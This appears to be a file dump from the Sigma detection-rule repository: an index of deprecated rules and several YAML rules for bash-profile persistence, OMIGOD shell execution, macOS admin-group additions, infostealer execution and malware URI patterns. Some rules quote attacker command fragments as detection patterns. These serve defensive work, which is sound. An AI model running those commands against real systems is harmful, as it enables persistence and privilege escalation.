"id": "17eb8e57-9983-420d-ad8a-2c4976c22eb8",
"title": "MavInject Process Injection",
"date": "2018-12-12",
"modified": "2022-12-19",
"level": "high"
},
{
"id": "36c5146c-d127-4f85-8e21-01bf62355d5a",
"title": "Invoke-Obfuscation Via Use Rundll32",
"date": "2019-10-08",
"modified": "2022-12-30",
"level": "high"
},
{
"id": "6d3f1399-a81c-4409-aff3-1ecfe9330baf",
"title": "PrintNightmare Powershell Exploitation",
"date": "2021-08-09",
"modified": "2023-01-02",
"level": "high"
},
{
"id": "83083ac6-1816-4e76-97d7-59af9a9ae46e",
"title": "AzureHound PowerShell Commands",
"date": "2021-10-23",
"modified": "2023-01-02",
"level": "high"
},
{
"id": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8",
"title": "Indirect Command Exectuion via Forfiles",
"date": "2022-10-17",
"modified": "2023-01-04",
"level": "medium"
},
{
"id": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02",
"title": "Indirect Command Execution",
"date": "2019-10-24",
"modified": "2023-01-04",
"level": "low"
},
{
"id": "e4b63079-6198-405c-abd7-3fe8b0ce3263",
"title": "Suspicious CLR Logs Creation",
"date": "2020-10-12",
"modified": "2023-01-05",
"level": "high"
},
{
"id": "cd5c8085-4070-4e22-908d-a5b3342deb74",
"title": "Suspicious Bitstransfer via PowerShell",
"date": "2021-08-19",
"modified": "2023-01-10",
"level": "medium"
},
{
"id": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20",
"title": "Renamed PowerShell",
"date": "2019-08-22",
"modified": "2023-01-18",
"level": "high"
},
{
"id": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2",
"title": "Renamed Rundll32.exe Execution",
"date": "2022-06-08",
"modified": "2023-01-18",
"level": "high"
},
{
"id": "e31f89f7-36fb-4697-8ab6-48823708353b",
"title": "Suspicious Cmd Execution via WMI",
"date": "2022-09-27",
"modified": "2023-01-19",
"level": "medium"
},
{
"id": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2",
"title": "Netcat The Powershell Version - PowerShell Module",
"date": "2021-07-21",
"modified": "2023-01-20",
"level": "medium"
},
{
"id": "47688f1b-9f51-4656-b013-3cc49a166a36",
"title": "Base64 Encoded Listing of Shadowcopy",
"date": "2022-03-01",
"modified": "2023-01-30",
"level": "high"
},
{
"id": "5b572dcf-254b-425c-a8c5-d9af6bea35a6",
"title": "Potential Xor Encoded PowerShell Command",
"date": "2022-07-06",
"modified": "2023-01-30",
"level": "medium"
},
{
"id": "fd6e2919-3936-40c9-99db-0aa922c356f7",
"title": "Malicious Base64 Encoded Powershell Invoke Cmdlets",
"date": "2022-05-31",
"modified": "2023-01-30",
"level": "high"
},
{
"id": "eeb66bbb-3dde-4582-815a-584aee9fe6d1",
"title": "Correct Execution of Nltest.exe",
"date": "2021-10-04",
"modified": "2023-02-02",
"level": "high"
},
{
"id": "0acaad27-9f02-4136-a243-c357202edd74",
"title": "Ryuk Ransomware Command Line Activity",
"date": "2019-08-06",
"modified": "2023-02-03",
"level": "critical"
},
{
"id": "4f927692-68b5-4267-871b-073c45f4f6fe",
"title": "PowerShell AMSI Bypass Pattern",
"date": "2022-11-04",
"modified": "2023-02-03",
"level": "high"
},
{
"id": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e",
"title": "Registry Dump of SAM Creds and Secrets",
"date": "2022-01-05",
"modified": "2023-02-04",
"level": "high"
},
{
"id": "04f5363a-6bca-42ff-be70-0d28bf629ead",
"title": "Office Applications Spawning Wmi Cli Alternate",
"date": "2021-08-23",
"modified": "2023-02-04",
"level": "high"
},
{
"id": "23daeb52-e6eb-493c-8607-c4f0246cb7d8",
"title": "New Lolbin Process by Office Applications",
"date": "2021-08-23",
"modified": "2023-02-04",
"level": "high"
},
{
"id": "518643ba-7d9c-4fa5-9f37-baed36059f6a",
"title": "WMI Execution Via Office Process",
"date": "2021-08-23",
"modified": "2023-02-04",
"level": "medium"
},
{
"id": "77815820-246c-47b8-9741-e0def3f57308",
"title": "Domain Trust Discovery",
"date": "2019-10-23",
"modified": "2023-02-04",
"level": "medium"
},
{
"id": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0",
"title": "Credential Acquisition via Registry Hive Dumping",
"date": "2022-10-04",
"modified": "2023-02-06",
"level": "high"
},
{
"id": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3",
"title": "Execute MSDT.EXE Using Diagcab File",
"date": "2022-06-09",
"modified": "2023-02-06",
"level": "high"
},
{
"id": "9841b233-8df8-4ad7-9133-b0b4402a9014",
"title": "Sysinternals SDelete Registry Keys",
"date": "2020-05-02",
"modified": "2023-02-07",
"level": "medium"
},
{
"id": "09af397b-c5eb-4811-b2bb-08b3de464ebf",
"title": "WMI Reconnaissance List Remote Services",
"date": "2022-01-01",
"modified": "2023-02-14",
"level": "medium"
},
{
"id": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b",
"title": "Renamed PaExec Execution",
"date": "2019-04-17",
"modified": "2023-02-14",
"level": "medium"
},
{
"id": "bc3cc333-48b9-467a-9d1f-d44ee594ef48",
"title": "SCM DLL Sideload",
"date": "2022-12-01",
"modified": "2023-02-14",
"level": "medium"
},
{
"id": "e42af9df-d90b-4306-b7fb-05c863847ebd",
"title": "WMI Remote Command Execution",
"date": "2022-03-13",
"modified": "2023-02-14",
"level": "medium"
},
{
"id": "fa4b21c9-0057-4493-b289-2556416ae4d7",
"title": "Squirrel Lolbin",
"date": "2019-11-12",
"modified": "2023-02-14",
"level": "medium"
},
{
"id": "e011a729-98a6-4139-b5c4-bf6f6dd8239a",
"title": "Suspicious Certutil Command Usage",
"date": "2019-01-16",
"modified": "2023-02-15",
"level": "high"
},
{
"id": "034affe8-6170-11ec-844f-0f78aa0c4d66",
"title": "Mimikatz MemSSP Default Log File Creation",
"date": "2021-12-20",
"modified": "2023-02-16",
"level": "critical"
},
{
"id": "7fe71fc9-de3b-432a-8d57-8c809efc10ab",
"title": "New Service Creation",
"date": "2019-10-21",
"modified": "2023-02-20",
"level": "low"
},
{
"id": "056a7ee1-4853-4e67-86a0-3fd9ceed7555",
"title": "Invoke-Obfuscation RUNDLL LAUNCHER",
"date": "2020-10-18",
"modified": "2023-02-21",
"level": "medium"
},
{
"id": "3ede524d-21cc-472d-a3ce-d21b568d8db7",
"title": "PsExec Service Start",
"date": "2018-03-13",
"modified": "2023-02-28",
"level": "low"
},
{
"id": "80167ada-7a12-41ed-b8e9-aa47195c66a1",
"title": "Run Whoami as SYSTEM",
"date": "2019-10-23",
"modified": "2023-02-28",
"level": "high"
},
{
"id": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba",
"title": "PsExec Tool Execution",
"date": "2017-06-12",
"modified": "2023-02-28",
"level": "low"
},
{
"id": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9",
"title": "Suspicious Characters in CommandLine",
"date": "2022-04-27",
"modified": "2023-03-03",
"level": "high"
},
{
"id": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b",
"title": "Stop Or Remove Antivirus Service",
"date": "2021-07-07",
"modified": "2023-03-04",
"level": "high"
},
{
"id": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b",
"title": "Suspicious Execution of Sc to Delete AV Services",
"date": "2022-08-01",
"modified": "2023-03-04",
"level": "high"
},
{
"id": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2",
"title": "Renamed PsExec",
"date": "2019-05-21",
"modified": "2023-03-04",
"level": "high"
},
{
"id": "1a70042a-6622-4a2b-8958-267625349abf",
"title": "Run from a Zip File",
"date": "2021-12-26",
"modified": "2023-03-05",
"level": "medium"
},
{
"id": "46591fae-7a4c-46ea-aec3-dff5e6d785dc",
"title": "Root Certificate Installed",
"date": "2020-10-10",
"modified": "2023-03-05",
"level": "medium"
},
{
"id": "eb87818d-db5d-49cc-a987-d5da331fbd90",
"title": "Stop Windows Service",
"date": "2019-10-23",
"modified": "2023-03-05",
"level": "low"
},
{
"id": "23250293-eed5-4c39-b57a-841c8933a57d",
"title": "Visual Basic Script Execution",
"date": "2022-01-02",
"modified": "2023-03-06",
"level": "medium"
},
{
"id": "344482e4-a477-436c-aa70-7536d18a48c7",
"title": "Execution via MSSQL Xp_cmdshell Stored Procedure",
"date": "2022-09-28",
"modified": "2023-03-06",
"level": "high"
},
{
"id": "00a4bacd-6db4-46d5-9258-a7d5ebff4003",
"title": "Read and Execute a File Via Cmd.exe",
"date": "2022-08-20",
"modified": "2023-03-07",
"level": "medium"
},
{
"id": "70e68156-6571-427b-a6e9-4476a173a9b6",
"title": "Cmd Stream Redirection",
"date": "2022-02-04",
"modified": "2023-03-07",
"level": "medium"
},
{
"id": "033fe7d6-66d1-4240-ac6b-28908009c71f",
"title": "APT29",
"date": "2018-12-04",
"modified": "2023-03-08",
"level": "high"
},
{
"id": "04d9079e-3905-4b70-ad37-6bdf11304965",
"title": "CrackMapExecWin",
"date": "2018-04-08",
"modified": "2023-03-08",
"level": "critical"
},
{
"id": "18739897-21b1-41da-8ee4-5b786915a676",
"title": "GALLIUM Artefacts",
"date": "2020-02-07",
"modified": "2023-03-09",
"level": "high"
},
{
"id": "0eb2107b-a596-422e-b123-b389d5594ed7",
"title": "Hurricane Panda Activity",
"date": "2019-03-04",
"modified": "2023-03-10",
"level": "high"
},
{
"id": "4a12fa47-c735-4032-a214-6fab5b120670",
"title": "Lazarus Activity Apr21",
"date": "2021-04-20",
"modified": "2023-03-10",
"level": "high"
},
{
"id": "7454df60-1478-484b-810d-bff5d0ba6d4b",
"title": "DNS Tunnel Technique from MuddyWater",
"date": "2020-06-04",
"modified": "2023-03-10",
"level": "critical"
},
{
"id": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e",
"title": "Lazarus Loaders",
"date": "2020-12-23",
"modified": "2023-03-10",
"level": "critical"
},
{
"id": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8",
"title": "Suspicious Add Scheduled Task From User AppData Temp",
"date": "2021-11-03",
"modified": "2023-03-14",
"level": "high"
},
{
"id": "d813d662-785b-42ca-8b4a-f7457d78d5a9",
"title": "Suspicious Load of Advapi31.dll",
"date": "2022-02-03",
"modified": "2023-03-15",
"level": "informational"
},
{
"id": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9",
"title": "Edit of .bash_profile and .bashrc",
"date": "2019-05-12",
"modified": "2023-03-23",
"level": "medium"
},
{
"id": "ba2a7c80-027b-460f-92e2-57d113897dbc",
"title": "App Permissions Granted For Other APIs",
"date": "2022-07-28",
"modified": "2023-03-29",
"level": "medium"
},
{
"id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4",
"title": "TA505 Dropper Load Pattern",
"date": "2020-12-08",
"modified": "2023-04-05",
"level": "critical"
},
{
"id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8",
"title": "Potential PowerShell Base64 Encoded Shellcode",
"date": "2018-11-17",
"modified": "2023-04-06",
"level": "medium"
},
{
"id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153",
"title": "Microsoft Binary Github Communication",
"date": "2017-08-24",
"modified": "2023-04-18",
"level": "high"
},
{
"id": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1",
"title": "Domestic Kitten FurBall Malware Pattern",
"date": "2021-02-08",
"modified": "2023-04-20",
"level": "high"
},
{
"id": "6355a919-2e97-4285-a673-74645566340d",
"title": "Process Memory Dumped Via RdrLeakDiag.EXE",
"date": "2022-01-04",
"modified": "2023-04-24",
"level": "high"
},
{
"id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e",
"title": "Group Modification Logging",
"date": "2019-03-26",
"modified": "2023-04-26",
"level": "low"
},
{
"id": "410ad193-a728-4107-bc79-4419789fcbf8",
"title": "Trickbot Malware Reconnaissance Activity",
"date": "2019-12-28",
"modified": "2023-04-28",
"level": "high"
},
{
"id": "fce5f582-cc00-41e1-941a-c6fabf0fdb8c",
"title": "Suspicious PowerShell Invocations - Specific",
"date": "2017-03-05",
"modified": "2023-05-04",
"level": "high"
},
{
"id": "f016c716-754a-467f-a39e-63c06f773987",
"title": "Suspicious Remote Thread Target",
"date": "2022-08-25",
"modified": "2023-05-05",
"level": "medium"
},
{
"id": "65d2be45-8600-4042-b4c0-577a1ff8a60e",
"title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe",
"date": "2019-10-25",
"modified": "2023-05-22",
"level": "medium"
},
{
"id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d",
"title": "Regsvr32 Anomaly",
"date": "2019-01-16",
"modified": "2023-05-26",
"level": "high"
},
{
"id": "fe6e002f-f244-4278-9263-20e4b593827f",
"title": "Alternate PowerShell Hosts - Image",
"date": "2019-09-12",
"modified": "2023-06-01",
"level": "low"
},
{
"id": "9e77ed63-2ecf-4c7b-b09d-640834882028",
"title": "PsExec Pipes Artifacts",
"date": "2020-05-10",
"modified": "2023-08-07",
"level": "medium"
},
{
"id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4",
"title": "Execution via CL_Mutexverifiers.ps1",
"date": "2020-10-14",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "4cd29327-685a-460e-9dac-c3ab96e549dc",
"title": "Execution via CL_Invocation.ps1 - Powershell",
"date": "2020-10-14",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5",
"title": "Abusing Windows Telemetry For Persistence - Registry",
"date": "2020-09-29",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "7c637634-c95d-4bbf-b26c-a82510874b34",
"title": "Disable Microsoft Office Security Features",
"date": "2021-06-08",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "8a58209c-7ae6-4027-afb0-307a78e4589a",
"title": "User Account Hidden By Registry",
"date": "2022-08-20",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "9b894e57-033f-46cf-b7fa-a52804181973",
"title": "Office Security Settings Changed",
"date": "2020-05-22",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "c81fe886-cac0-4913-a511-2822d72ff505",
"title": "SilentProcessExit Monitor Registration",
"date": "2021-02-26",
"modified": "2023-08-17",
"level": "high"
},
{
"id": "0c1ffcf9-efa9-436e-ab68-23a9496ebf5b",
"title": "User Added To Admin Group - MacOS",
"date": "2023-03-19",
"modified": "2023-08-22",
"level": "medium"
},
{
"id": "5b80cf53-3a46-4adc-960b-05ec19348d74",
"title": "Wscript Execution from Non C Drive",
"date": "2022-10-01",
"modified": "2023-08-29",
"level": "medium"
},
{
"id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a",
"title": "LSASS Memory Dump File Creation",
"date": "2019-10-22",
"modified": "2023-08-29",
"level": "high"
},
{
"id": "839f1ee1-292d-495a-bf37-818267b8ee82",
"title": "Vulnerable Driver Load By Name",
"date": "2022-10-03",
"modified": "2023-09-03",
"level": "low"
},
{
"id": "21b23707-60d6-41bb-96e3-0f0481b0fed9",
"title": "Vulnerable Dell BIOS Update Driver Load",
"date": "2021-05-05",
"modified": "2023-09-12",
"level": "high"
},
{
"id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647",
"title": "Vulnerable GIGABYTE Driver Load",
"date": "2022-07-25",
"modified": "2023-09-12",
"level": "high"
},
{
"id": "7c676970-af4f-43c8-80af-ec9b49952852",
"title": "Vulnerable AVAST Anti Rootkit Driver Load",
"date": "2022-07-28",
"modified": "2023-09-12",
"level": "high"
},
{
"id": "9bacc538-d1b9-4d42-862e-469eafc05a41",
"title": "Vulnerable HW Driver Load",
"date": "2022-07-26",
"modified": "2023-09-12",
"level": "high"
},
{
"id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4",
"title": "Vulnerable Lenovo Driver Load",
"date": "2022-11-10",
"modified": "2023-09-12",
"level": "high"
},
{
"id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6",
"title": "Usage Of Malicious POORTRY Signed Driver",
"date": "2022-12-16",
"modified": "2023-09-13",
"level": "high"
},
{
"id": "d7825193-b70a-48a4-b992-8b5b3015cc11",
"title": "Windows Update Client LOLBIN",
"date": "2020-10-17",
"modified": "2023-11-11",
"level": "high"
},
{
"id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53",
"title": "New Service Uses Double Ampersand in Path",
"date": "2022-07-05",
"modified": "2023-11-15",
"level": "high"
},
{
"id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62",
"title": "Windows Defender Threat Detection Disabled",
"date": "2020-07-28",
"modified": "2023-11-22",
"level": "high"
},
{
"id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d",
"title": "Credential Dumping Tools Accessing LSASS Memory",
"date": "2017-02-16",
"modified": "2023-11-30",
"level": "high"
},
{
"id": "a122ac13-daf8-4175-83a2-72c387be339d",
"title": "Security Event Log Cleared",
"date": "2021-08-15",
"modified": "2023-12-06",
"level": "medium"
},
{
"id": "0332a266-b584-47b4-933d-a00b103e1b37",
"title": "Suspicious Get-WmiObject",
"date": "2022-01-12",
"modified": "2023-12-11",
"level": "low"
},
{
"id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073",
"title": "PowerShell Scripts Run by a Services",
"date": "2020-10-06",
"modified": "2023-12-11",
"level": "high"
},
{
"id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9",
"title": "Powershell File and Directory Discovery",
"date": "2021-12-15",
"modified": "2023-12-11",
"level": "low"
},
{
"id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2",
"title": "Credential Dumping Tools Service Execution",
"date": "2017-03-05",
"modified": "2023-12-11",
"level": "critical"
},
{
"id": "602a1f13-c640-4d73-b053-be9a2fa58b77",
"title": "Svchost DLL Search Order Hijack",
"date": "2019-10-28",
"modified": "2024-01-10",
"level": "high"
},
{
"id": "839dd1e8-eda8-4834-8145-01beeee33acd",
"title": "SAM Dump to AppData",
"date": "2018-01-27",
"modified": "2024-01-18",
"level": "high"
},
{
"id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7",
"title": "Possible Process Hollowing Image Loading",
"date": "2018-01-07",
"modified": "2024-01-22",
"level": "high"
},
{
"id": "a6d67db4-6220-436d-8afc-f3842fe05d43",
"title": "Dnscat Execution",
"date": "2019-10-24",
"modified": "2024-01-25",
"level": "critical"
},
{
"id": "d7b09985-95a3-44be-8450-b6eadf49833e",
"title": "Suspicious Non-Browser Network Communication With Reddit API",
"date": "2023-02-16",
"modified": "2024-02-02",
"level": "medium"
},
{
"id": "37325383-740a-403d-b1a2-b2b4ab7992e7",
"title": "CobaltStrike Malleable (OCSP) Profile",
"date": "2019-11-12",
"modified": "2024-02-15",
"level": "high"
},
{
"id": "41b42a36-f62c-4c34-bd40-8cb804a34ad8",
"title": "CobaltStrike Malformed UAs in Malleable Profiles",
"date": "2021-05-06",
"modified": "2024-02-15",
"level": "critical"
},
{
"id": "953b895e-5cc9-454b-b183-7f3db555452e",
"title": "CobaltStrike Malleable Amazon Browsing Traffic Profile",
"date": "2019-11-12",
"modified": "2024-02-15",
"level": "high"
},
{
"id": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc",
"title": "CobaltStrike Malleable OneDrive Browsing Traffic Profile",
"date": "2019-11-12",
"modified": "2024-02-15",
"level": "high"
},
{
"id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7",
"title": "Suspicious Rundll32 Script in CommandLine",
"date": "2021-12-04",
"modified": "2024-02-23",
"level": "medium"
},
{
"id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3",
"title": "Rundll32 JS RunHTMLApplication Pattern",
"date": "2022-01-14",
"modified": "2024-02-23",
"level": "high"
},
{
"id": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6",
"title": "iOS Implant URL Pattern",
"date": "2019-08-30",
"modified": "2024-02-26",
"level": "critical"
},
{
"id": "628d7a0b-7b84-4466-8552-e6138bc03b43",
"title": "Suspicious Epmap Connection",
"date": "2022-07-14",
"modified": "2024-03-01",
"level": "high"
},
{
"id": "9433ff9c-5d3f-4269-99f8-95fc826ea489",
"title": "CrackMapExec File Creation Patterns",
"date": "2022-03-12",
"modified": "2024-03-01",
"level": "high"
},
{
"id": "c625c4c2-515d-407f-8bb6-456f65955669",
"title": "Service Binary in Uncommon Folder",
"date": "2022-05-02",
"modified": "2024-03-25",
"level": "medium"
},
{
"id": "42f0e038-767e-4b85-9d96-2c6335bad0b5",
"title": "Adwind RAT / JRAT - Registry",
"date": "2017-11-10",
"modified": "2024-03-26",
"level": "high"
},
{
"id": "5039f3d2-406a-4c1a-9350-7a5a85dc84c2",
"title": "Search-ms and WebDAV Suspicious Indicators in URL",
"date": "2023-08-21",
"modified": "2024-05-10",
"level": "high"
},
{
"id": "b916cba1-b38a-42da-9223-17114d846fd6",
"title": "Potential NT API Stub Patching",
"date": "2023-01-07",
"modified": "2024-05-27",
"level": "medium"
},
{
"id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77",
"title": "Potential Persistence Via COM Hijacking From Suspicious Locations",
"date": "2022-07-28",
"modified": "2024-07-16",
"level": "high"
},
{
"id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb",
"title": "Suspicious Unattend.xml File Access",
"date": "2021-12-19",
"modified": "2024-07-22",
"level": "medium"
},
{
"id": "6902955a-01b7-432c-b32a-6f5f81d8f624",
"title": "Suspicious File Event With Teams Objects",
"date": "2022-09-16",
"modified": "2024-07-22",
"level": "high"
},
{
"id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12",
"title": "Potential Persistence Via COM Search Order Hijacking",
"date": "2020-04-14",
"modified": "2024-09-02",
"level": "medium"
},
{
"id": "a33f8808-2812-4373-ae95-8cfb82134978",
"title": "Windows Defender Exclusion Deleted",
"date": "2019-10-26",
"modified": "2025-01-30",
"level": "medium"
},
{
"id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e",
"title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script",
"date": "2021-12-26",
"modified": "2025-05-20",
"level": "high"
},
{
"id": "6e897651-f157-4d8f-aaeb-df8151488385",
"title": "PowerShell Web Download",
"date": "2022-03-24",
"modified": "2025-07-18",
"level": "medium"
},
{
"id": "f748c45a-f8d3-4e6f-b617-fe176f695b8f",
"title": ".RDP File Created by Outlook Process",
"date": "2024-11-01",
"modified": "2025-07-22",
"level": "high"
},
{
"id": "a2a3b925-7bb0-433b-b508-db9003263cc4",
"title": "Active Directory Parsing DLL Loaded Via Office Application",
"date": "2020-02-19",
"modified": "2025-10-17",
"level": "medium"
},
{
"id": "cdeef967-f9a1-4375-90ee-6978c5f23974",
"title": "Azure Application Credential Modified",
"date": "2021-09-02",
"modified": "2025-10-17",
"level": "medium"
},
{
"id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5",
"title": "PowerShell DownloadFile",
"date": "2020-08-28",
"modified": "2025-10-20",
"level": "high"
},
{
"id": "e28a5a99-da44-436d-b7a0-2afc20a5f413",
"title": "Whoami Utility Execution",
"date": "2018-08-13",
"modified": "2025-10-20",
"level": "low"
},
{
"id": "7417e29e-c2e7-4cf6-a2e8-767228c64837",
"title": "Active Directory Kerberos DLL Loaded Via Office Application",
"date": "2020-02-19",
"modified": "2025-10-22",
"level": "medium"
},
{
"id": "879c3015-c88b-4782-93d7-07adf92dbcb7",
"title": "Space After Filename",
"date": "2020-06-17",
"modified": "2025-11-22",
"level": "low"
},
{
"id": "e710a880-1f18-4417-b6a0-b5afdf7e305a",
"title": "Atomic MacOS Stealer - FileGrabber Infostealer Execution",
"date": "2025-09-12",
"modified": "2025-11-22",
"level": "high"
},
{
"id": "4be03877-d5b6-4520-85c9-a5911c0a656c",
"title": "FileFix - Suspicious Child Process from Browser File Upload Abuse",
"date": "2025-06-26",
"modified": "2025-11-24",
"level": "high"
},
{
"id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248",
"title": "File Download Via Bitsadmin To An Uncommon Target Folder",
"date": "2022-06-28",
"modified": "2025-12-10",
"level": "medium"
}
]
================================================
FILE: deprecated/linux/lnx_auditd_alter_bash_profile.yml
================================================
title: Edit of .bash_profile and .bashrc
id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9
status: deprecated
description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
references:
- 'MITRE Attack technique T1156; .bash_profile and .bashrc. '
author: Peter Matkovski
date: 2019/05/12
modified: 2023/03/23
tags:
- attack.s0003
- attack.persistence
- attack.t1546.004
logsource:
product: linux
service: auditd
detection:
selection:
type: 'PATH'
name:
- '/root/.bashrc'
- '/root/.bash_profile'
- '/root/.profile'
- '/home/*/.bashrc'
- '/home/*/.bash_profile'
- '/home/*/.profile'
- '/etc/profile'
- '/etc/shells'
- '/etc/bashrc'
- '/etc/csh.cshrc'
- '/etc/csh.login'
condition: selection
falsepositives:
- Admin or User activity
level: medium
================================================
FILE: deprecated/linux/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml
================================================
title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd
id: 045b5f9c-49f7-4419-a236-9854fb3c827a
status: unsupported # This rule requires correlations. See https://github.com/SigmaHQ/sigma/discussions/4440#discussioncomment-7070862 and https://user-images.githubusercontent.com/9653181/133756156-4fb9c2b1-aa65-4380-957b-72170de36fc4.png
description: |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.
Microsoft Azure, and Microsoft Operations Management Suite.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2021-09-17
modified: 2024-09-02
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.t1068
- attack.t1190
- attack.t1203
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
syscall: 'execve'
uid: 0
cwd: '/var/opt/microsoft/scx/tmp'
comm: 'sh'
condition: selection
falsepositives:
- Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.
level: high
================================================
FILE: deprecated/linux/lnx_space_after_filename_.yml
================================================
title: Space After Filename
id: 879c3015-c88b-4782-93d7-07adf92dbcb7
status: deprecated
description: Detects space after filename
author: Ömer Günal
date: 2020-06-17
modified: 2025-11-22
tags:
- attack.execution
- attack.t1059
logsource:
product: linux
detection:
selection1:
- 'echo "*" > * && chmod +x *'
selection2:
- 'mv * "* "'
condition: all of selection*
falsepositives:
- Typos
level: low
================================================
FILE: deprecated/macos/proc_creation_macos_add_to_admin_group.yml
================================================
title: User Added To Admin Group - MacOS
id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
status: deprecated
description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos
- https://ss64.com/osx/dscl.html
- https://ss64.com/osx/sysadminctl.html
author: Sohan G (D4rkCiph3r)
date: 2023/03/19
modified: 2023/08/22
tags:
- attack.t1078.003
- attack.initial_access
- attack.privilege_escalation
logsource:
category: process_creation
product: macos
detection:
selection_sysadminctl: #creates and adds new user to admin group
Image|endswith: '/sysadminctl'
CommandLine|contains|all:
- ' -addUser '
- ' -admin '
selection_dscl: #adds to admin group
Image|endswith: '/dscl'
CommandLine|contains|all:
- ' -append '
- ' /Groups/admin '
- ' GroupMembership '
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: deprecated/macos/proc_creation_macos_malware_amos_filegrabber_exec.yml
================================================
title: Atomic MacOS Stealer - FileGrabber Infostealer Execution
id: e710a880-1f18-4417-b6a0-b5afdf7e305a
status: deprecated
description: |
Detects the execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.
references:
- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn (Gen Digital)
date: 2025-09-12
modified: 2025-11-22
tags:
- attack.execution
- attack.t1059.002
- detection.emerging-threats
logsource:
category: process_creation
product: macos
detection:
selection:
CommandLine|contains|all:
- 'FileGrabber'
- '/tmp'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/other/generic_brute_force.yml
================================================
title: Brute Force
id: 53c7cca0-2901-493a-95db-d00d6fcf0a37
status: deprecated
description: Detects many authentication failures from one source to one destination which is may indicate Brute Force activity
author: Aleksandr Akhremchik, oscd.community
date: 2019/10/25
modified: 2022/11/04
logsource:
category: authentication
detection:
selection:
action: failure
timeframe: 600s
condition: selection | count(category) by dst_ip > 30
fields:
- src_ip
- dst_ip
- user
falsepositives:
- Inventarization
- Vulnerability scanner
- Legitimate application
level: medium
tags:
- attack.credential_access
- attack.t1110
================================================
FILE: deprecated/web/proxy_apt_domestic_kitten.yml
================================================
title: Domestic Kitten FurBall Malware Pattern
id: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1
status: deprecated
description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
references:
- https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
author: Florian Roth (Nextron Systems)
date: 2021/02/08
modified: 2023/04/20
tags:
- attack.command_and_control
logsource:
category: proxy
detection:
selection:
c-uri|contains:
- 'Get~~~AllBrowser'
- 'Get~~~HardwareInfo'
- 'Take~~RecordCall'
- 'Reset~~~AllCommand'
condition: selection
fields:
- c-ip
- c-uri
falsepositives:
- Unlikely
level: high
================================================
